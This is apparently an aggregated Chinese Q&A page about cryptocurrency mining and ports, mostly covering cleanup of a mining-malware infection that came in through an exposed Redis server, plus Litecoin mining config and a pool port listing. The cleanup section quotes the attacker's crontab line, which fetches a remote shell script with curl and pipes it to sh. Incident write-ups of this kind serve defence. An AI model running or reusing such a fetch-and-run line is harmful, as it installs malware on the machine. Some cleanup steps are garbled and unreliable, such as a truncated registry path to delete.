挖矿443端口

Ⅰ 如何用Linux服务器挖矿教程

今天早上起来一看，服务器脚本一个都没有启动!甚是奇怪，远程登录服务器，也是异常的卡，直到最后卡死，只好重新启动服务器!
启动之后没一会又会变卡，越来越卡，top查看进程！不觉又奇怪的进程，因为平常也不经常看！所以自己也搞不明白怎么回事儿！只好到群里问了问，说是被挖矿的挂了木马文件了，是由于redis的漏洞!
后来我自己发现，原来redis远程可以直接登录，原以为redis和mysql不开放登录权限就不会支持远程登录呢，看来是我想多了
看了好长时间才发现一个异常的进程，自启的进程 molibe ！
找到进程位置 ps -ef|grep molibe ;
在tmp目录下，打开一看的确是有
chmod -x molibe 取消执行权限在来到/var/spool/cron下，cat root 查看定时器的执行发现之前脚本都被改了，顾不得删除cron，service crond restart 重新启动,再有就时kill 掉molibe进程
这样大概整个就结束了！但是根本是因为redis漏洞，所以还是补上吧
首先修改redis'端口,找到redis.conf文件 port **** 修改端口号再有就是必须修改密码 # requirepass ******** 去除#号重新启动 /redis/src/redis-server /redis/redis-conf
启动成功之后
redis/redis-cli -p ****(端口) -a *****(密码)

Ⅱ 服务器445端口关闭对网站是否有什么影响

对网站没有什么影响的，关闭一些高危端口对服务器的安全性是非常的有必要的。

Ⅲ 莱特币怎么设置solo挖矿

（1）下载钱包软件，安装，同步数据完成后，关闭钱包软件；
（2）点系统 “开始”，“运行”，在里面输入 %appdata% 然后点确定（win XP和win7系统都是这样操作），或者同时按键盘 “win”键和 “R”键也可以打开运行界面。
（3）第二步点确定后，打开一个文件管理器，出来如下图所示的界面。在里面找到以货币名命名的文件夹，Litecoin，钱包软件对应的数据全在这个文件夹里面，双击打开这个文件夹。
（4）配置.conf文件
在开始，运行里面输入 notepad 确认，打开 记事本软件，在里面输入如下内容：(把下面的代码直接复制过去即可)
rpcuser=test
rpcpassword=test
rpcport=11095
daemon=1
server=1
gen=0
testnet=0
listen=0
maxconnections=100
rpcallowip=10.255.16.*

rpcuser、rpcpassword和rpcport你可以修改，也可以不改，rpcallowip需要根据你自己的情况进行修改。如果你的矿机和钱包软件在同一台机器，则删除rpcallowip这一行就可以了。
文件改好后，以Litecoin.conf为文件名保存到刚才的Litecoin目录里面，或者保存到桌面，再复制过去也可以。
以挖矿软件cgminer为例，修改cgminer.conf文件中的pools部分
url部分的IP地址为你钱包所在机器的IP地址，端口11095就是刚才在Litecoin.conf里面配置的端口，user和pass也是一样，和上面的配置文件保持一致即可。
另外建议修改另外两个参数的值如下：
"queue" : "0",
"scan-time" : "1",
设置完成，运行cgminer开始挖矿。。。。

Ⅳ 路由器怎么修改端口挖矿

进入路由器，有一个外部互联，里面有修改Web端口的选项，希望尽量不要改，因为好多数据接收是默认的端口，改过以后可能出现连接不上的问题。

Ⅳ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

Ⅵ 挖矿病毒怎么排查

登录系统查看任务管理器，查看占用内存较大且无法关闭的进程。进程上点击鼠标右键，打开文件位置（先要在文件夹选项中选择显示隐藏文件及操作系文件）。此时你可能会看到有一个Systmss.exe进程和模仿操作系统的svchost.exe进程这里还可以看到一个2.bat文件，右键编辑打开这个文件查看，可查看到恶意进程与哪个挖矿组织通信。

通过查看系统操作日志可分析出病毒的来源、启动时间等信息，一般原因可能是未关闭3389端口且使用了弱密码导致黑客远程登录上次病毒。

根除病毒：将病毒可执行文件Systmss.exe重命名为Systmss.exe1使病毒无法执行，此时可从任务管理器停止进程。打开注册表编辑器删除HKEY_LOCAL_整个目录。

如果是Linux系统请参考：网页链接

Ⅶ 想做挖矿应该注意些什么

首先要有质量过关的矿机 今日矿工多种优质矿机 售后周到 专业技术问题解答清晰

Ⅷ deepbit的挖矿端口是多少

{
"balance_host": "deepbit.net",
"balance_token_url": "http://deepbit.net/settings/",
"balance_url": "/api/%s",
"host": "pit.deepbit.net",
"name": "deepbit",
"port": 8332,
"url": "http://deepbit.net"
},

也就是说端口是：8332